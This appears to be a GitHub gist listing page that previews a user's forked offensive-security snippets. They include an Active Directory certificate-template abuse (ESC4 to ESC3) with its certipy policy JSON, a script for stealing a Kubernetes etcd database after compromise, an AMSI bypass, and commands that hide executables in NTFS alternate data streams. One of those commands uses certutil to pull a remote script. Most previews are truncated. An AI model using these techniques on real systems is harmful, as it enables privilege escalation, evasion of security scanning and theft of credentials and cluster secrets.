@beerandgin
beerandgin / Get-AzureADPSPermissionGrants.ps1
Created November 18, 2025 14:36 — forked from psignoret/Get-AzureADPSPermissionGrants.ps1
Get all permissions granted to an app in Azure AD
<#
.SYNOPSIS
Lists delegated permission grants (OAuth2PermissionGrants) and application permissions grants (AppRoleAssignments) granted to an app.
.PARAMETER ObjectId
The ObjectId of the ServicePrincipal object for the app in question.
.PARAMETER AppId
The AppId of the ServicePrincipal object for the app in question.
@beerandgin
beerandgin / ESC4-to-ESC3.sh
Created November 13, 2025 14:15 — forked from zimnyaa/ESC4-to-ESC3.sh
A simple way to abuse ESC4 without introducing ESC1 (creating an Enrollment Agent template instead).
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"]
@beerandgin
beerandgin / proxy
Last active October 27, 2025 21:38
proxy
# Disable SSL certificate validation for lab environment
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# Function to get Server ID
function Get-ServerId {
param(
[string]$Target,
[string]$ProxyUrl = $null,
[pscredential]$ProxyCredential = $null
)
@beerandgin
beerandgin / magic_bytes.json
Created October 10, 2025 21:25 — forked from neutrinoguy/magic_bytes.json
File signatures with their magic bytes.
{'ascii': '....',
'description': 'RedHat Package Manager (RPM) package',
'file_extension': 'rpm',
'hex': 'ed ab ee db',
'offset': '0'},
{'ascii': 'SP01',
'description': 'Amazon Kindle Update Package',
'file_extension': 'bin',
'hex': '53 50 30 31',
'offset': '0'},
@beerandgin
beerandgin / gist:0d2b263137faa1f4efdbbdeef6f7e7ad
Created September 29, 2025 21:49 — forked from garrettfoster13/gist:d5015133dcc728497f5941a431d6c515
Tweaked from Responder to Profile one remote SQL box
#! /usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
@beerandgin
beerandgin / wrapper.py
Created September 29, 2025 21:48 — forked from garrettfoster13/wrapper.py
wrapping minikerberos
import sys
import argparse
import asyncio
def ldap_url(auth_options):
url_format = {
"kerb_password": f"kerberos+password://{{domain}}\\{{username}}:{{password}}@{{fqdn}}/?dc={{dcip}}",
"kerb_rc4": f"kerberos+rc4://{{domain}}\\{{username}}:{{nt}}@{{fqdn}}/?dc={{dcip}}",
"kerb_aes": f"kerberos+aes://{{domain}}\\{{username}}:{{aeskey}}@{{fqdn}}/?dc={{dcip}}",
@beerandgin
beerandgin / steal_etcd.sh
Created September 11, 2025 10:22 — forked from grahamhelton/steal_etcd.sh
Quick bash script to steal an etcd database
#!/usr/bin/env bash
# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration
# This should be run post-compromise of a node
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
BLUE=$(tput setaf 4)
YELLOW=$(tput setaf 3)
TICK="$NOCOLOR[$GREEN+$NOCOLOR] "
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@beerandgin
beerandgin / Program.cs
Created July 24, 2025 06:04 — forked from wavvs/Program.cs
AMSI bypass via HAMSICONTEXT corruption (Windows 11 supported)
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Diagnostics;
using System.Threading;
using System.IO;
@beerandgin
beerandgin / Exe_ADS_Methods.md
Created July 24, 2025 06:02 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab